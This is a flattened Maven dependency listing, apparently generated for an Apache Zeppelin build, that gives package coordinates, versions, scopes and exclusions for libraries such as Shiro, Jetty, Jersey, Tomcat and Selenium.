commons-logging:commons-logging|org.apache.commons:commons-configuration2@2.9.0 org.slf4j:slf4j-api@1.7.36 org.apache.shiro:shiro-core 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-cache@1.10.0 org.apache.shiro:shiro-crypto-hash@1.10.0 org.apache.shiro:shiro-crypto-cipher@1.10.0 org.apache.shiro:shiro-config-core@1.10.0 org.apache.shiro:shiro-config-ogdl@1.10.0 org.apache.shiro:shiro-event@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-cache@1.13.0 org.apache.shiro:shiro-crypto-hash@1.13.0 org.apache.shiro:shiro-crypto-cipher@1.13.0 org.apache.shiro:shiro-config-core@1.13.0 org.apache.shiro:shiro-config-ogdl@1.13.0 org.apache.shiro:shiro-event@1.13.0 org.apache.shiro:shiro-crypto 1.10.0 1.13.0 org.apache.shiro:shiro-crypto-cipher 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-crypto-core@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-crypto-core@1.13.0 org.apache.shiro:shiro-crypto-core 1.10.0 org.apache.shiro:shiro-lang@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-crypto-hash 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-crypto-core@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-crypto-core@1.13.0 org.apache.shiro:shiro-event 1.10.0 org.apache.shiro:shiro-lang@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-lang 1.10.0 org.slf4j:slf4j-api@1.7.36 1.13.0 org.slf4j:slf4j-api@1.7.36 org.apache.shiro:shiro-root 1.10.0 1.12.0 1.13.0 org.apache.shiro:shiro-web 1.10.0 org.apache.shiro:shiro-core@1.10.0 Scope provided|javax.servlet.jsp:jsp-api@2.2 Scope provided|org.apache.taglibs:taglibs-standard-spec@1.2.5 Scope provided|org.apache.taglibs:taglibs-standard-impl@1.2.5 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.owasp.encoder:encoder@1.2.3 1.12.0 org.apache.shiro:shiro-core@1.12.0 Scope provided|javax.servlet.jsp:jsp-api@2.2 Scope provided|org.apache.taglibs:taglibs-standard-spec@1.2.5 Scope provided|org.apache.taglibs:taglibs-standard-impl@1.2.5 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.owasp.encoder:encoder@1.2.3 1.13.0 org.apache.shiro:shiro-core@1.13.0 Scope provided|javax.servlet.jsp:jsp-api@2.2 Scope provided|org.apache.taglibs:taglibs-standard-spec@1.2.5 Scope provided|org.apache.taglibs:taglibs-standard-impl@1.2.5 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.owasp.encoder:encoder@1.2.3 org.apache.taglibs:taglibs-parent 3 org.apache.taglibs:taglibs-standard 1.2.5 org.apache.taglibs:taglibs-standard-impl 1.2.5 Scope provided|org.apache.taglibs:taglibs-standard-spec@1.2.5 Scope provided|javax.servlet:servlet-api@2.5 Scope provided|javax.servlet.jsp:jsp-api@2.1 Scope provided|javax.el:el-api@1.0 Opt Scope provided|xalan:xalan@2.7.1 org.apache.taglibs:taglibs-standard-spec 1.2.5 Scope provided|javax.servlet:servlet-api@2.5 Scope provided|javax.servlet.jsp:jsp-api@2.1 Scope provided|javax.el:el-api@1.0 org.apache.thrift:libthrift 0.13.0 org.slf4j:slf4j-api@1.7.25 org.apache.httpcomponents:httpclient@4.5.6 org.apache.httpcomponents:httpcore@4.4.1 Scope provided|javax.servlet:servlet-api@2.5 javax.annotation:javax.annotation-api@1.3.2 0.14.0 org.slf4j:slf4j-api@1.7.28 org.apache.httpcomponents:httpclient@4.5.10 org.apache.httpcomponents:httpcore@4.4.12 org.apache.tomcat.embed:tomcat-embed-core@8.5.46 javax.annotation:javax.annotation-api@1.3.2 org.apache.tomcat.embed:tomcat-embed-core 8.5.46 org.apache.tomcat:tomcat-annotations-api@8.5.46 9.0.106 org.apache.tomcat:tomcat-annotations-api@9.0.106 9.0.110 org.apache.tomcat:tomcat-annotations-api@9.0.110 org.apache.tomcat:tomcat-annotations-api 8.5.46 9.0.106 9.0.110 org.apache.zeppelin:zeppelin 0.11.1 0.12.0 org.apache.zeppelin:zeppelin-common 0.11.1 com.google.code.gson:gson@2.8.9 org.slf4j:slf4j-api@1.7.35 org.apache.zeppelin:zeppelin-interpreter 0.11.1 org.apache.zeppelin:zeppelin-common@0.11.1 MavenExclusions org.apache.commons:commons-lang3|io.atomix:atomix@3.0.0-rc5 io.atomix:atomix-raft@3.0.0-rc5 io.atomix:atomix-primary-backup@3.0.0-rc5 org.apache.commons:commons-lang3@3.12.0 MavenExclusions commons-logging:commons-logging|org.apache.thrift:libthrift@0.13.0 com.google.code.gson:gson@2.8.9 MavenExclusions commons-logging:commons-logging|org.apache.commons:commons-configuration2@2.8.0 MavenExclusions commons-logging:commons-logging|commons-beanutils:commons-beanutils@1.9.4 org.apache.commons:commons-exec@1.3 org.apache.commons:commons-pool2@2.3 commons-io:commons-io@2.7 MavenExclusions ch.qos.reload4j:reload4j|org.slf4j:slf4j-reload4j@1.7.35 ch.qos.reload4j:reload4j@1.2.25 org.slf4j:jcl-over-slf4j@1.7.35 org.apache.maven:maven-plugin-api@3.6.3 MavenExclusions org.codehaus.plexus:plexus-classworlds,org.codehaus.plexus:plexus-utils|org.eclipse.sisu:org.eclipse.sisu.plexus@0.3.4 org.apache.maven:maven-resolver-provider@3.6.3 org.apache.maven.resolver:maven-resolver-connector-basic@1.4.1 org.apache.maven.resolver:maven-resolver-transport-file@1.4.1 org.apache.maven.resolver:maven-resolver-transport-http@1.4.1 jline:jline@2.14.3 Scope provided MavenExclusions log4j:log4j,org.slf4j:slf4j-log4j12|org.apache.hadoop:hadoop-common@2.7.7 Scope provided MavenExclusions log4j:log4j|org.apache.hadoop:hadoop-yarn-client@2.7.7 0.12.0 org.apache.zeppelin:zeppelin-common@0.12.0 org.apache.commons:commons-lang3@3.14.0 MavenExclusions commons-logging:commons-logging|org.apache.thrift:libthrift@0.13.0 com.google.code.gson:gson@2.8.9 com.google.code.findbugs:jsr305@3.0.2 MavenExclusions commons-logging:commons-logging|org.apache.commons:commons-configuration2@2.10.1 MavenExclusions commons-logging:commons-logging|commons-beanutils:commons-beanutils@1.9.4 org.apache.commons:commons-exec@1.3 org.apache.commons:commons-pool2@2.3 commons-io:commons-io@2.15.1 MavenExclusions ch.qos.reload4j:reload4j|org.slf4j:slf4j-reload4j@1.7.35 ch.qos.reload4j:reload4j@1.2.25 org.slf4j:jcl-over-slf4j@1.7.35 org.apache.maven:maven-plugin-api@3.6.3 MavenExclusions org.codehaus.plexus:plexus-classworlds,org.codehaus.plexus:plexus-utils|org.eclipse.sisu:org.eclipse.sisu.plexus@0.3.4 org.apache.maven:maven-resolver-provider@3.6.3 org.apache.maven.resolver:maven-resolver-connector-basic@1.4.1 org.apache.maven.resolver:maven-resolver-transport-file@1.4.1 org.apache.maven.resolver:maven-resolver-transport-http@1.4.1 jline:jline@2.14.3 Scope provided MavenExclusions commons-logging:commons-logging|org.apache.hadoop:hadoop-client-runtime@3.3.6 org.apache.zeppelin:zeppelin-jupyter 0.11.1 com.google.code.gson:gson@2.8.9 org.danilopianini:gson-extras@0.2.2 commons-cli:commons-cli@1.4 MavenExclusions commons-logging:commons-logging|com.vladsch.flexmark:flexmark-all@0.62.2 org.apache.commons:commons-lang3@3.12.0 org.apache.zeppelin:zeppelin-zengine 0.11.1 org.apache.zeppelin:zeppelin-common@0.11.1 org.apache.zeppelin:zeppelin-interpreter@0.11.1 MavenExclusions org.ow2.asm:asm,org.jsoup:jsoup|org.apache.zeppelin:zeppelin-jupyter@0.11.1 org.slf4j:slf4j-api@1.7.35 commons-io:commons-io@2.7 commons-cli:commons-cli@1.4 org.bouncycastle:bcpkix-jdk15on@1.70 MavenExclusions commons-httpclient:commons-httpclient|org.apache.commons:commons-vfs2-jackrabbit1@2.6.0 MavenExclusions commons-logging:commons-logging|org.apache.httpcomponents:httpclient@4.5.13 MavenExclusions commons-logging:commons-logging|org.apache.httpcomponents:httpasyncclient@4.0.2 org.eclipse.jetty:jetty-client@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-client@9.4.52.v20230823 org.quartz-scheduler:quartz@2.3.2 io.micrometer:micrometer-core@1.6.0 io.dropwizard.metrics:metrics-healthchecks@4.1.14 com.google.code.gson:gson@2.8.9 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-analyzers-common@8.7.0 org.apache.lucene:lucene-queryparser@8.7.0 org.apache.lucene:lucene-highlighter@8.7.0 MavenExclusions org.codehaus.plexus:plexus-utils,org.apache.commons:commons-compress,com.fasterxml.jackson.core:jackson-databind|com.github.eirslett:frontend-plugin-core@1.6 MavenExclusions org.codehaus.plexus:plexus-utils,org.apache.hadoop:hadoop-hdfs-client|org.apache.commons:commons-vfs2@2.6.0 org.eclipse.jgit:org.eclipse.jgit@4.5.4.201711221230-r org.codehaus.jettison:jettison@1.5.4 org.apache.commons:commons-lang3@3.12.0 org.apache.commons:commons-compress@1.21 Scope provided MavenExclusions log4j:log4j|org.apache.hadoop:hadoop-common@2.7.7 Scope provided MavenExclusions javax.servlet:servlet-api,org.apache.avro:avro,org.apache.jackrabbit:jackrabbit-webdav,io.netty:netty,commons-httpclient:commons-httpclient,org.eclipse.jgit:org.eclipse.jgit,com.jcraft:jsch,org.apache.commons:commons-compress,xml-apis:xml-apis,xerces:xercesImpl,org.codehaus.jackson:jackson-mapper-asl,org.codehaus.jackson:jackson-core-asl,com.google.guava:guava,com.google.code.findbugs:jsr305,org.apache.commons:commons-math3,commons-logging:commons-logging,log4j:log4j|org.apache.hadoop:hadoop-yarn-client@2.7.7 org.apache.zookeeper:zookeeper 3.4.6 org.slf4j:slf4j-api@1.6.1 org.slf4j:slf4j-log4j12@1.6.1 Opt|org.apache.maven.wagon:wagon-http@2.4 Opt|org.apache.maven:maven-ant-tasks@2.1.3 log4j:log4j@1.2.16 jline:jline@0.9.94 io.netty:netty@3.7.0.Final Opt|org.vafer:jdeb@0.8 Opt|jdiff:jdiff@1.0.9 Opt|xerces:xerces@1.4.4 Opt|org.apache.rat:apache-rat-tasks@0.6 Opt|commons-lang:commons-lang@2.4 Opt|commons-collections:commons-collections@3.1 org.apache:apache 4 6 7 9 10 11 12 13 14 15 16 17 18 19 21 23 24 27 28 29 30 31 33 34 35 org.apiguardian:apiguardian-api 1.1.0 org.assertj:assertj-core 1.7.0 Scope provided|junit:junit@4.10 Opt|cglib:cglib-nodep@2.2.2 org.awaitility:awaitility 4.2.0 org.hamcrest:hamcrest@2.1 org.bitbucket.cowwoc:diff-match-patch 1.1 org.bouncycastle:bcpkix-jdk15on 1.70 org.bouncycastle:bcprov-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on 1.70 org.bouncycastle:bcutil-jdk15on 1.70 org.bouncycastle:bcprov-jdk15on@1.70 org.brotli:dec 0.1.2 org.brotli:parent 0.1.2 org.checkerframework:checker-compat-qual 2.0.0 org.checkerframework:checker-qual 3.33.0 org.codehaus.jackson:jackson-core-asl 1.9.13 org.codehaus.jackson:jackson-jaxrs 1.8.3 org.codehaus.jackson:jackson-core-asl@1.8.3 org.codehaus.jackson:jackson-mapper-asl@1.8.3 org.codehaus.jackson:jackson-mapper-asl 1.9.13 org.codehaus.jackson:jackson-core-asl@1.9.13 org.codehaus.jackson:jackson-xc 1.8.3 org.codehaus.jackson:jackson-core-asl@1.8.3 org.codehaus.jackson:jackson-mapper-asl@1.8.3 org.codehaus.jettison:jettison 1.5.4 org.codehaus.mojo:animal-sniffer-annotations 1.14 org.codehaus.mojo:animal-sniffer-parent 1.14 org.codehaus.mojo:mojo-parent 34 org.codehaus.plexus:plexus 2.0.7 5.1 org.codehaus.plexus:plexus-classworlds 2.6.0 org.codehaus.plexus:plexus-component-annotations 1.5.5 org.codehaus.plexus:plexus-containers 1.5.5 org.codehaus.plexus:plexus-interpolation 1.25 org.codehaus.plexus:plexus-utils 3.2.1 org.codehaus:codehaus-parent 1 4 org.danilopianini:gson-extras 0.2.2 com.google.code.gson:gson@2.8.6 Scope runtime|javax.annotation:jsr250-api@1.0 org.eclipse.ee4j:project 1.0.2 1.0.5 1.0.6 org.eclipse.jetty.websocket:javax-websocket-client-impl 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-client@9.4.52.v20230823 javax.websocket:javax.websocket-client-api@1.0 org.eclipse.jetty.websocket:javax-websocket-server-impl 9.4.52.v20230823 org.eclipse.jetty:jetty-annotations@9.4.52.v20230823 org.eclipse.jetty.websocket:javax-websocket-client-impl@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-server@9.4.52.v20230823 javax.websocket:javax.websocket-api@1.0 org.eclipse.jetty.websocket:websocket-api 9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-client 9.2.12.v20150709 org.eclipse.jetty:jetty-util@9.2.12.v20150709 org.eclipse.jetty:jetty-io@9.2.12.v20150709 org.eclipse.jetty.websocket:websocket-common@9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty:jetty-client@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-xml@9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-common@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-common 9.2.12.v20150709 org.eclipse.jetty.websocket:websocket-api@9.2.12.v20150709 org.eclipse.jetty:jetty-util@9.2.12.v20150709 org.eclipse.jetty:jetty-io@9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-api@9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-parent 9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-server 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-common@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-client@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-servlet@9.4.52.v20230823 org.eclipse.jetty:jetty-servlet@9.4.52.v20230823 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-http@9.4.52.v20230823 Scope provided|org.eclipse.jetty:jetty-server@9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-servlet 9.4.52.v20230823 org.eclipse.jetty.websocket:websocket-api@9.4.52.v20230823 javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-annotations 9.4.52.v20230823 org.eclipse.jetty:jetty-plus@9.4.52.v20230823 org.eclipse.jetty:jetty-webapp@9.4.52.v20230823 javax.annotation:javax.annotation-api@1.3.2 org.ow2.asm:asm@9.5 org.ow2.asm:asm-commons@9.5 org.eclipse.jetty:jetty-client 9.4.52.v20230823 org.eclipse.jetty:jetty-http@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 org.eclipse.jetty:jetty-core 12.0.12 org.eclipse.jetty:jetty-http 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 Scope provided|javax.servlet:javax.servlet-api@3.1.0 12.0.12 org.eclipse.jetty:jetty-io@12.0.12 org.eclipse.jetty:jetty-util@12.0.12 org.slf4j:slf4j-api@2.0.13 org.eclipse.jetty:jetty-io 9.2.12.v20150709 org.eclipse.jetty:jetty-util@9.2.12.v20150709 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 org.eclipse.jetty:jetty-jmx 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jetty:jetty-jndi 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 Scope provided|org.eclipse.jetty:jetty-webapp@9.4.52.v20230823 Scope provided MavenExclusions org.eclipse.jetty.orbit:javax.activation|org.eclipse.jetty.orbit:javax.mail.glassfish@1.4.1.v201005082020 org.eclipse.jetty:jetty-parent 14 23 org.eclipse.jetty:jetty-plus 9.4.52.v20230823 Scope provided|javax.transaction:javax.transaction-api@1.3 org.eclipse.jetty:jetty-webapp@9.4.52.v20230823 org.eclipse.jetty:jetty-jndi@9.4.52.v20230823 org.eclipse.jetty:jetty-project 9.2.12.v20150709 9.4.52.v20230823 9.4.56.v20240826 9.4.57.v20241219 12.0.12 org.eclipse.jetty:jetty-security 9.4.52.v20230823 org.eclipse.jetty:jetty-server@9.4.52.v20230823 org.eclipse.jetty:jetty-server 9.4.52.v20230823 javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-http@9.4.52.v20230823 org.eclipse.jetty:jetty-io@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 9.4.56.v20240826 javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-http@9.4.56.v20240826 org.eclipse.jetty:jetty-io@9.4.56.v20240826 Opt|org.eclipse.jetty:jetty-jmx@9.4.56.v20240826 9.4.57.v20241219 javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-http@9.4.57.v20241219 org.eclipse.jetty:jetty-io@9.4.57.v20241219 Opt|org.eclipse.jetty:jetty-jmx@9.4.57.v20241219 org.eclipse.jetty:jetty-servlet 9.4.52.v20230823 org.eclipse.jetty:jetty-security@9.4.52.v20230823 org.eclipse.jetty:jetty-util-ajax@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 org.eclipse.jetty:jetty-util 9.2.12.v20150709 Scope provided|javax.servlet:javax.servlet-api@3.1.0 Opt Scope provided|org.slf4j:slf4j-api@1.6.6 9.4.52.v20230823 org.eclipse.jetty:jetty-util-ajax 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 Scope provided|javax.servlet:javax.servlet-api@3.1.0 org.eclipse.jetty:jetty-webapp 9.4.52.v20230823 org.eclipse.jetty:jetty-xml@9.4.52.v20230823 org.eclipse.jetty:jetty-servlet@9.4.52.v20230823 Opt|org.eclipse.jetty:jetty-jmx@9.4.52.v20230823 org.eclipse.jetty:jetty-xml 9.4.52.v20230823 org.eclipse.jetty:jetty-util@9.4.52.v20230823 org.eclipse.jgit:org.eclipse.jgit 4.5.4.201711221230-r com.jcraft:jsch@0.1.53 com.googlecode.javaewah:JavaEWAH@0.7.9 org.apache.httpcomponents:httpclient@4.3.6 org.slf4j:slf4j-api@1.7.2 Scope provided|javax.servlet:javax.servlet-api@3.1.0 5.13.3.202401111512-r com.googlecode.javaewah:JavaEWAH@1.1.13 org.slf4j:slf4j-api@1.7.30 6.10.1.202505221210-r com.googlecode.javaewah:JavaEWAH@1.2.3 org.slf4j:slf4j-api@1.7.36 commons-codec:commons-codec@1.17.0 org.eclipse.jgit:org.eclipse.jgit-parent 4.5.4.201711221230-r 5.13.3.202401111512-r 6.10.1.202505221210-r org.eclipse.sisu:org.eclipse.sisu.inject 0.3.4 Scope provided|com.google.inject:guice@3.0 org.eclipse.sisu:org.eclipse.sisu.plexus 0.3.4 Scope provided|com.google.inject:guice@3.0 MavenExclusions javax.el:el-api,org.jboss.ejb3:jboss-ejb3-api,org.jboss.interceptor:jboss-interceptor-api|javax.enterprise:cdi-api@1.0 org.eclipse.sisu:org.eclipse.sisu.inject@0.3.4 org.codehaus.plexus:plexus-component-annotations@1.5.5 org.codehaus.plexus:plexus-classworlds@2.5.2 org.codehaus.plexus:plexus-utils@3.0.17 Opt|junit:junit@4.11 org.eclipse.sisu:sisu-inject 0.3.4 org.eclipse.sisu:sisu-plexus 0.3.4 org.glassfish.hk2.external:aopalliance-repackaged 2.6.1 Opt|aopalliance:aopalliance@1.0 org.glassfish.hk2.external:jakarta.inject 2.6.1 Opt|javax.inject:javax.inject@1 org.glassfish.hk2:external 2.6.1 org.glassfish.hk2:hk2-api 2.6.1 Opt|org.glassfish.hk2:osgi-resource-locator@1.0.3 org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2:hk2-utils@2.6.1 org.glassfish.hk2.external:aopalliance-repackaged@2.6.1 org.glassfish.hk2:hk2-locator 2.6.1 org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2.external:aopalliance-repackaged@2.6.1 org.glassfish.hk2:hk2-api@2.6.1 org.glassfish.hk2:hk2-utils@2.6.1 jakarta.annotation:jakarta.annotation-api@1.3.4 org.javassist:javassist@3.22.0-CR2 org.glassfish.hk2:hk2-parent 2.6.1 org.glassfish.hk2:hk2-utils 2.6.1 jakarta.annotation:jakarta.annotation-api@1.3.4 org.glassfish.hk2.external:jakarta.inject@2.6.1 Opt|javax.validation:validation-api@2.0.1.Final Opt|org.hibernate.validator:hibernate-validator@6.0.10.Final Opt|org.jboss.logging:jboss-logging@3.3.1.Final Opt|com.fasterxml:classmate@1.3.3 org.glassfish.hk2:osgi-resource-locator 1.0.3 Scope provided|org.osgi:osgi.core@6.0.0 Scope provided|org.osgi:osgi.cmpn@6.0.0 org.glassfish.jersey.containers:jersey-container-servlet-core 2.30 Scope provided|jakarta.servlet:jakarta.servlet-api@4.0.3 Scope provided|jakarta.persistence:jakarta.persistence-api@2.2.3 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.jersey.core:jersey-common@2.30 org.glassfish.jersey.core:jersey-server@2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.containers:project 2.30 org.glassfish.jersey.core:jersey-common@2.30 org.glassfish.jersey.core:jersey-server@2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.core:jersey-client 2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.core:jersey-common@2.30 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.jersey.core:jersey-common 2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 jakarta.annotation:jakarta.annotation-api@1.3.5 Scope provided|org.osgi:org.osgi.core@6.0.0 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2:osgi-resource-locator@1.0.3 2.34 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 jakarta.annotation:jakarta.annotation-api@1.3.5 Scope provided|org.osgi:org.osgi.core@6.0.0 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2:osgi-resource-locator@1.0.3 org.glassfish.jersey.core:jersey-server 2.30 org.glassfish.jersey.core:jersey-common@2.30 org.glassfish.jersey.core:jersey-client@2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.media:jersey-media-jaxb@2.30 jakarta.annotation:jakarta.annotation-api@1.3.5 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 jakarta.validation:jakarta.validation-api@2.0.2 Scope provided|org.osgi:org.osgi.core@6.0.0 org.glassfish.jersey.ext:jersey-entity-filtering 2.30 Scope provided|org.glassfish.jersey.core:jersey-client@2.30 Scope provided|org.glassfish.jersey.core:jersey-server@2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.ext:project 2.30 jakarta.ws.rs:jakarta.ws.rs-api@2.1.6 org.glassfish.jersey.inject:jersey-hk2 2.30 org.glassfish.jersey.core:jersey-common@2.30 MavenExclusions jakarta.annotation:jakarta.annotation-api,org.javassist:javassist|org.glassfish.hk2:hk2-locator@2.6.1 org.javassist:javassist@3.25.0-GA org.glassfish.jersey.inject:project 2.30 org.glassfish.jersey.media:jersey-media-jaxb 2.30 org.glassfish.jersey.core:jersey-common@2.30 Scope provided|jakarta.xml.bind:jakarta.xml.bind-api@2.3.2 MavenExclusions javax.inject:javax.inject|org.glassfish.hk2.external:jakarta.inject@2.6.1 org.glassfish.hk2:osgi-resource-locator@1.0.3 org.glassfish.jersey.media:jersey-media-json-jackson 2.30 org.glassfish.jersey.core:jersey-common@2.30 org.glassfish.jersey.ext:jersey-entity-filtering@2.30 com.fasterxml.jackson.core:jackson-annotations@2.9.9 com.fasterxml.jackson.core:jackson-databind@2.9.9 com.fasterxml.jackson.module:jackson-module-jaxb-annotations@2.9.9 org.glassfish.jersey.media:project 2.30 org.glassfish.jersey:project 2.30 2.34 org.glassfish.web:jsp 2.2 org.hamcrest:hamcrest 2.2 org.hdrhistogram:HdrHistogram 2.1.12 org.hibernate.search:hibernate-search-bom 7.1.1.Final org.infinispan:infinispan-bom 11.0.17.Final 11.0.19.Final 15.0.5.Final org.infinispan:infinispan-build-configuration-parent 11.0.17.Final 11.0.19.Final 15.0.5.Final org.javassist:javassist 3.25.0-GA org.jboss.weld:weld-api-bom 1.0 org.jboss.weld:weld-api-parent 1.0 org.jboss.weld:weld-parent 6 org.jboss:jboss-parent 36 43 org.jetbrains:annotations 15.0 org.json:json 20240205 org.junit.jupiter:junit-jupiter-api 5.7.1 org.apiguardian:apiguardian-api@1.1.0 org.opentest4j:opentest4j@1.2.0 org.junit.platform:junit-platform-commons@1.7.1 org.junit.jupiter:junit-jupiter-engine 5.7.1 org.apiguardian:apiguardian-api@1.1.0 org.junit.platform:junit-platform-engine@1.7.1 org.junit.jupiter:junit-jupiter-api@5.7.1 org.junit.jupiter:junit-jupiter-params 5.7.1 org.apiguardian:apiguardian-api@1.1.0 org.junit.jupiter:junit-jupiter-api@5.7.1 org.junit.platform:junit-platform-commons 1.7.1 org.apiguardian:apiguardian-api@1.1.0 org.junit.platform:junit-platform-engine 1.7.1 org.apiguardian:apiguardian-api@1.1.0 org.opentest4j:opentest4j@1.2.0 org.junit.platform:junit-platform-commons@1.7.1 org.junit:junit-bom 5.7.1 5.9.1 5.9.2 5.10.0 5.10.1 5.10.2 5.10.3 5.10.5 5.11.4 5.12.2 5.13.1 org.kohsuke:libpam4j 1.11 net.java.dev.jna:jna@4.5.2 org.kohsuke:pom 17 org.latencyutils:LatencyUtils 2.0.3 org.hdrhistogram:HdrHistogram@2.1.8 org.mockito:mockito-core 3.12.4 net.bytebuddy:byte-buddy@1.11.13 net.bytebuddy:byte-buddy-agent@1.11.13 org.objenesis:objenesis@3.2 org.mortbay.jetty:jetty 6.1.26 org.mortbay.jetty:jetty-util@6.1.26 org.mortbay.jetty:servlet-api@2.5-20081211 org.mortbay.jetty:jetty-parent 10 org.mortbay.jetty:jetty-sslengine 6.1.26 org.mortbay.jetty:jetty@6.1.26 org.mortbay.jetty:jetty-util 6.1.26 Scope provided|org.mortbay.jetty:servlet-api@2.5-20081211 Opt|org.slf4j:slf4j-api@1.3.1 org.mortbay.jetty:project 6.1.26 org.nibor.autolink:autolink 0.6.0 org.objenesis:objenesis 2.5.1 3.2 org.objenesis:objenesis-parent 2.5.1 3.2 org.opentest4j:opentest4j 1.2.0 org.osgi:org.osgi.core 6.0.0 org.ow2.asm:asm 5.0.4 9.5 org.ow2.asm:asm-bom 9.7 org.ow2.asm:asm-commons 9.5 org.ow2.asm:asm@9.5 org.ow2.asm:asm-tree@9.5 org.ow2.asm:asm-parent 5.0.4 org.ow2.asm:asm-tree 9.5 org.ow2.asm:asm@9.5 org.ow2:ow2 1.3 1.5.1 org.owasp.encoder:encoder 1.2.3 org.owasp.encoder:encoder-parent 1.2.3 org.quartz-scheduler:quartz 2.3.2 com.mchange:c3p0@0.9.5.4 com.mchange:mchange-commons-java@0.2.15 com.zaxxer:HikariCP-java7@2.4.13 org.slf4j:slf4j-api@1.7.7 org.quartz-scheduler:quartz-parent 2.3.2 org.seleniumhq.selenium:selenium-api 2.48.2 com.google.guava:guava@18.0 com.google.code.gson:gson@2.3.1 org.apache.httpcomponents:httpclient@4.5.1 org.seleniumhq.selenium:selenium-chrome-driver 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 org.seleniumhq.selenium:selenium-edge-driver 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 commons-io:commons-io@2.4 org.apache.commons:commons-exec@1.3 org.seleniumhq.selenium:selenium-firefox-driver 2.48.2 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 commons-io:commons-io@2.4 org.apache.commons:commons-exec@1.3 org.seleniumhq.selenium:selenium-htmlunit-driver 2.48.2 org.seleniumhq.selenium:selenium-support@2.48.2 net.sourceforge.htmlunit:htmlunit@2.18 org.apache.httpcomponents:httpclient@4.5.1 org.seleniumhq.selenium:selenium-ie-driver 2.48.2 net.java.dev.jna:jna@4.1.0 net.java.dev.jna:jna-platform@4.1.0 org.seleniumhq.selenium:selenium-remote-driver@2.48.2 org.seleniumhq.selenium:selenium-java 2.48.2 org.seleniumhq.selenium:selenium-chrome-driver@2.48.2 org.seleniumhq.selenium:selenium-edge-driver@2.48.2 org.seleniumhq.selenium:selenium-htmlunit-driver@2.48.2 org.seleniumhq.selenium:selenium-firefox-driver@2.48.2 org.seleniumhq.selenium:selenium-ie-driver@2.48.2 org.seleniumhq.selenium:selenium-safari-driver@2.48.2 org.seleniumhq.selenium:selenium-support@2.48.2 org.webbitserver:webbit@0.4.14 org.seleniumhq.selenium:selenium-leg-rc@2.48.2 org.seleniumhq.selenium:selenium-leg-rc 2.48.2 